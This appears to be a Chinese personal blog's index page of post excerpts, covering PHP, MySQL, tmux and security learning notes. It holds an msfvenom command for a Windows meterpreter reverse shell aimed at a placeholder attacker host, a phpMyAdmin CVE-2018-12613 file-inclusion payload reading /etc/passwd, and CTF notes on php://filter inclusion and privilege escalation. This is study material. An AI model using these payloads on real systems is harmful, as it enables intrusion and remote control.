上一页 1 ··· 5 6 7 8 9 10 11 12 13 下一页
摘要: php中没有单独的文件创建函数,如果我们想创建函数,可以使用fopen(),fopen()函数字面意思是打开文件,但该函数也有创建文件的功能,当使用 fopen() 函数打开一个文件时,如果文件不存在,则会尝试创建该文件,并返回一个资源。 php fopen函数介绍 fopen函数打开文件或者 UR 阅读全文
posted @ 2020-12-25 20:22 !rbash 阅读(410) 评论(0) 推荐(0) 编辑
摘要: 第一步: 使用下面的命令打开mysql的配置文件,去除68,69行的注释,然后保存。 sudo vi /etc/mysql/mysql.conf.d/mysqld.cnf 第二步: 重启mysql服务,就会产生mysql日志文件。 sudo service mysql restart 额外: MyS 阅读全文
posted @ 2020-12-25 09:05 !rbash 阅读(1163) 评论(0) 推荐(0) 编辑
摘要: payload命令 windows: msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST= 攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\x 阅读全文
posted @ 2020-12-24 21:31 !rbash 阅读(222) 评论(0) 推荐(0) 编辑
摘要: msf作为一款强大的漏洞检测工具,如何生成适用于msf的payload以及如何利用是使用msf的关键,今天就主要记录一下常用的payload以及如何使用。生成payload使用的工具是MSFVenom,下面看看他的帮助信息。 在kali下可以使用如下命令列出MSFVenom可以生成的payload列 阅读全文
posted @ 2020-12-24 20:16 !rbash 阅读(710) 评论(0) 推荐(0) 编辑
摘要: 无意中发现了这个工具,感觉蛮好用的,哈哈 基本操作 新建会话:tmux new -s session-name 查看会话:tmux ls 进入会话:tmux a -t session-name 断开会话:tmux detach 关闭会话:tmux kill-session -t session-na 阅读全文
posted @ 2020-12-24 14:50 !rbash 阅读(192) 评论(0) 推荐(0) 编辑
该文被密码保护。 阅读全文
posted @ 2020-12-24 10:40 !rbash 阅读(0) 评论(0) 推荐(0) 编辑
摘要: %25=% %3f=? 阅读全文
posted @ 2020-12-23 18:43 !rbash 阅读(90) 评论(0) 推荐(0) 编辑
摘要: phpMyadmin(CVE-2018-12613)后台任意文件包含漏洞影响版本:4.8.0——4.8.1payload:/phpmyadmin/?target=db_datadict.php%253f/../../../../../../../../etc/passwd本题payload:/php 阅读全文
posted @ 2020-12-23 18:40 !rbash 阅读(277) 评论(0) 推荐(0) 编辑
摘要: 本题主要考查了利用php://filter伪协议进行文件包含 进入题目根据Tip进入正题,可以看到URL中存在文件包含(题目名也很直接) 首先考虑 "php://input"伪协议 + POST发送PHP代码 的经典套路 重新考虑之后使用 "php://filter"伪协议" 来进行包含。当它与包含 阅读全文
posted @ 2020-12-23 17:02 !rbash 阅读(1592) 评论(2) 推荐(0) 编辑
摘要: linux下敏感用户,目录信息: https://www.freebuf.com/articles/system/23993.html Linux提权之利用 /etc/passwd 文件(低权用户下添加新用户): https://blog.csdn.net/qq_36119192/article/d 阅读全文
posted @ 2020-12-23 10:35 !rbash 阅读(182) 评论(0) 推荐(0) 编辑
上一页 1 ··· 5 6 7 8 9 10 11 12 13 下一页